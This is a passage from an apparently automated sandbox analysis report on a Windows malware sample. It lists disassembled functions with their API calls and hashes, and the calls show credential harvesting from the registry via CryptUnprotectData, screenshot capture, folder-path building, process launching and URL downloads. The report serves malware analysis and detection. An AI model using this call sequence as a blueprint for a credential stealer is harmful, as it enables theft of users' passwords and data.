                                                    • Opcode Fuzzy Hash: edf0bac9685c6a4e32c5945965864e6577cf50905678e5db7fdfb665f3f8e1b6
                                                    • Instruction Fuzzy Hash: 28915FB29012589FCB10DFA4DC849DEBBBAFF48314F1485AEE509AB251E7319D45CF90
                                                    Function 00407710 Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 202stringregistrymemoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00407745
                                                    • RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 0040778A
                                                    • strlen.MSVCRT ref: 004077BE
                                                    • StrStrA.SHLWAPI(?,Password), ref: 004077F8
                                                    • strlen.MSVCRT ref: 0040788D
                                                      • Part of subcall function 00407690: GetProcessHeap.KERNEL32(00000008,00000400), ref: 0040769E
                                                      • Part of subcall function 00407690: HeapAlloc.KERNEL32(00000000), ref: 004076A5
                                                      • Part of subcall function 00407690: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 004076CD
                                                      • Part of subcall function 00407690: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 004076ED
                                                      • Part of subcall function 00407690: LocalFree.KERNEL32(?), ref: 004076F7
                                                    • strcpy_s.MSVCRT ref: 00407821
                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0040782C
                                                    • HeapFree.KERNEL32(00000000), ref: 00407833
                                                    • strlen.MSVCRT ref: 00407840
                                                    • strcpy_s.MSVCRT ref: 0040786A
                                                    • strlen.MSVCRT ref: 004078B4
                                                    • RegEnumValueA.ADVAPI32(80000001,00000000,?,000000FF,00000000,00000003,?,?,80000001), ref: 00407975
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1833400574.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004CD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004DA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004F9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000507000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000522000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000055D000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000580000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Heapstrlen$EnumFreeProcessValuestrcpy_s$AllocByteCharCryptDataLocalMultiOpenUnprotectWide
                                                    • String ID: Password
                                                    • API String ID: 3893107980-3434357891
                                                    • Opcode ID: 14964dbc208ebe2bd5570b721c02be0e9f6531da3a0e9e1e01ace35e59106e74
                                                    • Instruction ID: e4d9b8b39298a74cb5cd03489e7ec67c358bc82c244f10be08d5cfcaf05cec85
                                                    • Opcode Fuzzy Hash: 14964dbc208ebe2bd5570b721c02be0e9f6531da3a0e9e1e01ace35e59106e74
                                                    • Instruction Fuzzy Hash: 16810EB1D00219AFDB10DF95DC84ADEB7B9EF48300F10816AE505F7250EB75AA45CFA5
                                                    Function 024A18A7 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 141stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?), ref: 024A18E8
                                                    • lstrcpy.KERNEL32(00000000,00638C44), ref: 024A1913
                                                    • lstrlen.KERNEL32(?,?,?,?), ref: 024A1920
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 024A193D
                                                    • lstrcat.KERNEL32(00000000,?), ref: 024A194B
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 024A1971
                                                    • lstrlen.KERNEL32(00638AA8,?,?,?), ref: 024A1986
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 024A19A9
                                                    • lstrcat.KERNEL32(00000000,00638AA8), ref: 024A19B1
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 024A19D9
                                                    • ShellExecuteEx.SHELL32(?), ref: 024A1A14
                                                    • ExitProcess.KERNEL32 ref: 024A1A4A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy$lstrcatlstrlen$ExecuteExitFileModuleNameProcessShell
                                                    • String ID: <
                                                    • API String ID: 3579039295-4251816714
                                                    • Opcode ID: 09672bfc39b299f7ced09603c6e6124d4d2c1ad6886d1f581e8bb92200c670ac
                                                    • Instruction ID: 49022ed202889c59c8f78524536b6dab712a68cd85727021c6d8bec9d49c5d92
                                                    • Opcode Fuzzy Hash: 09672bfc39b299f7ced09603c6e6124d4d2c1ad6886d1f581e8bb92200c670ac
                                                    • Instruction Fuzzy Hash: 5D515E7090165AAFDB11EFB5CC94A9EBBFEAF54304F04512AE909E3350DB74AA05CF90
                                                    Function 0041F100 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 163stringmemoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 0041F134
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 0041F162
                                                    • StrCmpCA.SHLWAPI(00000000,ERROR,?,?,?,?,?,?,?,?,?,?,?,?,0041F67A), ref: 0041F176
                                                    • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,0041F67A), ref: 0041F185
                                                    • LocalAlloc.KERNEL32(00000040,00000001,?,?,?,?,?,?,?,?,?,?,?,?,0041F67A), ref: 0041F1A3
                                                    • StrStrA.SHLWAPI(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0041F67A), ref: 0041F1D1
                                                    • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0041F67A), ref: 0041F1E4
                                                    • strtok.MSVCRT(00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,0041F67A), ref: 0041F1F6
                                                    • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041F67A), ref: 0041F202
                                                    • lstrcpy.KERNEL32(00000000,ERROR), ref: 0041F24F
                                                    • lstrcpy.KERNEL32(00000000,ERROR), ref: 0041F28F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1833400574.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004CD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004DA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004F9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000507000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000522000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000055D000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000580000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy$lstrlen$AllocLocalstrtok
                                                    • String ID: ERROR
                                                    • API String ID: 2137491262-2861137601
                                                    • Opcode ID: 05761cc4364c42234ee252b2b5c3c3c7f577dcc16320945f4f877e0f0401f89e
                                                    • Instruction ID: 57b76eaee00c9718718f693bae5590ba1c15cb9a89fb7e987ba6136f15d61003
                                                    • Opcode Fuzzy Hash: 05761cc4364c42234ee252b2b5c3c3c7f577dcc16320945f4f877e0f0401f89e
                                                    • Instruction Fuzzy Hash: DB51D375A002019FCB20AF75CD49AAB77B5AF44314F04417AF849EB3A1DB78DC468BD8
                                                    Function 0249F367 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 163stringmemoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 0249F39B
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 0249F3C9
                                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 0249F3DD
                                                    • lstrlen.KERNEL32(00000000), ref: 0249F3EC
                                                    • LocalAlloc.KERNEL32(00000040,00000001), ref: 0249F40A
                                                    • StrStrA.SHLWAPI(00000000,?), ref: 0249F438
                                                    • lstrlen.KERNEL32(?), ref: 0249F44B
                                                    • strtok.MSVCRT(00000001,?), ref: 0249F45D
                                                    • lstrlen.KERNEL32(00000000), ref: 0249F469
                                                    • lstrcpy.KERNEL32(00000000,ERROR), ref: 0249F4B6
                                                    • lstrcpy.KERNEL32(00000000,ERROR), ref: 0249F4F6
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy$lstrlen$AllocLocalstrtok
                                                    • String ID: ERROR
                                                    • API String ID: 2137491262-2861137601
                                                    • Opcode ID: 5b04030854d19af2b8db990e9c3e012bdc99472458b3ca0eed52a94b25b620b2
                                                    • Instruction ID: 58810328c4fb73da123c7c4718baa0c800fbe1020e8ab8ef1bd1dd6cdab2ddd0
                                                    • Opcode Fuzzy Hash: 5b04030854d19af2b8db990e9c3e012bdc99472458b3ca0eed52a94b25b620b2
                                                    • Instruction Fuzzy Hash: BB51AE719112916FCB21FF39CC48EAE7BA6AF85708F05451AEC09DBB11EB74D806CB90
                                                    Function 0040A070 Relevance: 18.3, APIs: 12, Instructions: 251stringlibraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetEnvironmentVariableA.KERNEL32(009483E8,00639BD8,0000FFFF), ref: 0040A086
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 0040A0B3
                                                    • lstrlenA.KERNEL32(00639BD8), ref: 0040A0C0
                                                    • lstrcpy.KERNEL32(00000000,00639BD8), ref: 0040A0EA
                                                    • lstrlenA.KERNEL32(00435210), ref: 0040A0F5
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0040A112
                                                    • lstrcatA.KERNEL32(00000000,00435210), ref: 0040A11E
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0040A144
                                                    • lstrcatA.KERNEL32(00000000,00000000), ref: 0040A14F
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0040A174
                                                    • SetEnvironmentVariableA.KERNEL32(009483E8,00000000), ref: 0040A18F
                                                    • LoadLibraryA.KERNEL32(0094F320), ref: 0040A1A3
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1833400574.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004CD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004DA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004F9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000507000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000522000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000055D000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000580000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                                    • String ID:
                                                    • API String ID: 2929475105-0
                                                    • Opcode ID: e71572c05e61fd10cfa811daea49d805ade7cf6361090e2ab5aad4db3d6ecf1a
                                                    • Instruction ID: 94f9c8f72257bf504f41825e736cba288604a750adbbaa2107b6746afa8b652b
                                                    • Opcode Fuzzy Hash: e71572c05e61fd10cfa811daea49d805ade7cf6361090e2ab5aad4db3d6ecf1a
                                                    • Instruction Fuzzy Hash: E491B231600B009FC7209FA4DC44AA736A6EB44709F40517AF805AB3E1EBBDDD918BD6
                                                    Function 0248A2D7 Relevance: 18.3, APIs: 12, Instructions: 251stringlibraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetEnvironmentVariableA.KERNEL32(006388B4,00639BD8,0000FFFF), ref: 0248A2ED
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 0248A31A
                                                    • lstrlen.KERNEL32(00639BD8), ref: 0248A327
                                                    • lstrcpy.KERNEL32(00000000,00639BD8), ref: 0248A351
                                                    • lstrlen.KERNEL32(00435210), ref: 0248A35C
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0248A379
                                                    • lstrcat.KERNEL32(00000000,00435210), ref: 0248A385
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0248A3AB
                                                    • lstrcat.KERNEL32(00000000,00000000), ref: 0248A3B6
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0248A3DB
                                                    • SetEnvironmentVariableA.KERNEL32(006388B4,00000000), ref: 0248A3F6
                                                    • LoadLibraryA.KERNEL32(00638D78), ref: 0248A40A
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                                    • String ID:
                                                    • API String ID: 2929475105-0
                                                    • Opcode ID: bace05496e01b1bd5bfa0f9a446348f260bebc96a6f440727fdd5c41bd0dc464
                                                    • Instruction ID: 896ba7f317dcafe886ad9cd4fc0695b11cd8b35f18dcb7dc61e31aff38a7851f
                                                    • Opcode Fuzzy Hash: bace05496e01b1bd5bfa0f9a446348f260bebc96a6f440727fdd5c41bd0dc464
                                                    • Instruction Fuzzy Hash: AB91CF70A20A209FD721BF65DC88AAF37A2EB44709B54042BE90587361EBF5D981CFD0
                                                    Function 0040BCE9 Relevance: 18.2, APIs: 12, Instructions: 249stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 0040BD0F
                                                    • lstrlenA.KERNEL32(00000000), ref: 0040BD42
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0040BD6C
                                                    • lstrcatA.KERNEL32(00000000,00000000), ref: 0040BD74
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0040BD9C
                                                    • lstrlenA.KERNEL32(0043509C), ref: 0040BE13
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1833400574.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004CD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004DA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004F9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000507000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000522000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000055D000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000580000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy$lstrlen$lstrcat
                                                    • String ID:
                                                    • API String ID: 2500673778-0
                                                    • Opcode ID: 3b66287a07ebacd2529adab9549b2e3bbf352f1bbbc10a604505cc36abde3a7d
                                                    • Instruction ID: 76368cc7b8b4fa27ce7ffa11b26ea8b40865ffa98968743eda1335703526e589
                                                    • Opcode Fuzzy Hash: 3b66287a07ebacd2529adab9549b2e3bbf352f1bbbc10a604505cc36abde3a7d
                                                    • Instruction Fuzzy Hash: B4A13D71A012058FCB14DF29C949A9BB7B1EF44304F14847AE405AB3E1DB79DC42CBD8
                                                    Function 0249EAE7 Relevance: 18.2, APIs: 12, Instructions: 200stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 0249EB35
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 0249EB67
                                                    • lstrcat.KERNEL32(?,00000000), ref: 0249EB73
                                                    • lstrcat.KERNEL32(?,004354E4), ref: 0249EB8A
                                                    • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 0249EBF3
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 0249EC27
                                                    • lstrcat.KERNEL32(?,00000000), ref: 0249EC33
                                                    • lstrcat.KERNEL32(?,00435504), ref: 0249EC4A
                                                    • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0249ECB8
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 0249ECE9
                                                    • lstrcat.KERNEL32(?,00000000), ref: 0249ECF5
                                                    • lstrcat.KERNEL32(?,00435518), ref: 0249ED0C
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcat$FolderPathlstrcpy
                                                    • String ID:
                                                    • API String ID: 818526691-0
                                                    • Opcode ID: 334e6dd0bb3a256dce1f211927443b096a94995497771f00d173ec70529dc1f7
                                                    • Instruction ID: fb3f8baaa6f8b27468973f32f27e20519c49ebdf06d8a2e3fb5a776fdae2b2b4
                                                    • Opcode Fuzzy Hash: 334e6dd0bb3a256dce1f211927443b096a94995497771f00d173ec70529dc1f7
                                                    • Instruction Fuzzy Hash: A461E371614394BBD724FF70DC45FDE7BA5AF88700F00881EBA8996190EBB4D509CBA6
                                                    Function 00418240 Relevance: 18.2, APIs: 12, Instructions: 173stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • strtok_s.MSVCRT ref: 00418263
                                                    • lstrlenA.KERNEL32(00000000), ref: 0041829C
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 004182D3
                                                    • lstrlenA.KERNEL32(00000000), ref: 004182F0
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00418327
                                                    • lstrlenA.KERNEL32(00000000), ref: 00418344
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 0041837B
                                                    • lstrlenA.KERNEL32(00000000), ref: 00418398
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 004183C7
                                                    • lstrlenA.KERNEL32(00000000), ref: 004183E1
                                                    • lstrcpy.KERNEL32(00000000,00000000), ref: 00418410
                                                    • strtok_s.MSVCRT ref: 0041842A
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1833400574.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004CD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004DA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004F9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000507000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000522000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000055D000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000580000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpylstrlen$strtok_s
                                                    • String ID:
                                                    • API String ID: 2211830134-0
                                                    • Opcode ID: 479635f4f195f76c08dbf8a3615428a40a852f8c8e2790974ea812ab78c6037d
                                                    • Instruction ID: 84294ead90c4b52274de6bcb271b081bded899c4d10f8e28530b9caff154e1d2
                                                    • Opcode Fuzzy Hash: 479635f4f195f76c08dbf8a3615428a40a852f8c8e2790974ea812ab78c6037d
                                                    • Instruction Fuzzy Hash: F3516F716006139BDB149F39D948AABB7A5EF04340F10412AEC05E7384EF78E991CBE4
                                                    Function 024A4427 Relevance: 16.7, APIs: 11, Instructions: 178COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 024A44CB
                                                    • GetDesktopWindow.USER32 ref: 024A44D5
                                                    • GetWindowRect.USER32(00000000,?), ref: 024A44E3
                                                    • SelectObject.GDI32(00000000,00000000), ref: 024A451A
                                                    • GetHGlobalFromStream.COMBASE(?,?), ref: 024A459C
                                                    • GlobalLock.KERNEL32(?), ref: 024A45A7
                                                    • GlobalSize.KERNEL32(?), ref: 024A45B6
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Global$StreamWindow$CreateDesktopFromLockObjectRectSelectSize
                                                    • String ID:
                                                    • API String ID: 1264946473-0
                                                    • Opcode ID: f1d89ebb8a1d82e9856d53e6c9ad6d898912e967da030e87eb5b05a88891f30c
                                                    • Instruction ID: d0866998523f89f3759b3b11a90aa1635d8f1d00066f226d3979a7b5c5cd9130
                                                    • Opcode Fuzzy Hash: f1d89ebb8a1d82e9856d53e6c9ad6d898912e967da030e87eb5b05a88891f30c
                                                    • Instruction Fuzzy Hash: 6F51F7B1114344AFD710EF65DC88EAEBBEAAF88714F00491EF95593250DBB4E905CFA2
                                                    Function 0249E327 Relevance: 16.7, APIs: 11, Instructions: 175stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • lstrcat.KERNEL32(?,00638B0C), ref: 0249E394
                                                    • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0249E3BE
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 0249E3F6
                                                    • lstrcat.KERNEL32(?,00000000), ref: 0249E404
                                                    • lstrcat.KERNEL32(?,?), ref: 0249E41F
                                                    • lstrcat.KERNEL32(?,?), ref: 0249E433
                                                    • lstrcat.KERNEL32(?,00638A84), ref: 0249E447
                                                    • lstrcat.KERNEL32(?,?), ref: 0249E45B
                                                    • lstrcat.KERNEL32(?,00638AC8), ref: 0249E46E
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 0249E4A6
                                                    • GetFileAttributesA.KERNEL32(00000000), ref: 0249E4AD
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcat$lstrcpy$AttributesFileFolderPath
                                                    • String ID:
                                                    • API String ID: 4230089145-0
                                                    • Opcode ID: efdba4d8b89c5cc5677c8f72ff9d71f47fb5f6e71c51ae459b2a2002eafe85b4
                                                    • Instruction ID: 8bff67d4ac5a50012e309b8b83085e701663b10fd8a02f7b6f6a00340f58dc74
                                                    • Opcode Fuzzy Hash: efdba4d8b89c5cc5677c8f72ff9d71f47fb5f6e71c51ae459b2a2002eafe85b4
                                                    • Instruction Fuzzy Hash: 886191B191116CABCF15EF74CC44ADD7BB6AF48300F1049AAE949A3250DBB4AF85DF90
                                                    Function 00406A10 Relevance: 16.6, APIs: 11, Instructions: 127networkfilestringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 00406A3F
                                                    • InternetOpenA.WININET(0042D01C,00000001,00000000,00000000,00000000), ref: 00406A6C
                                                    • StrCmpCA.SHLWAPI(?,00950150), ref: 00406A8A
                                                    • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,-00800100,00000000), ref: 00406AAA
                                                    • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00406AC8
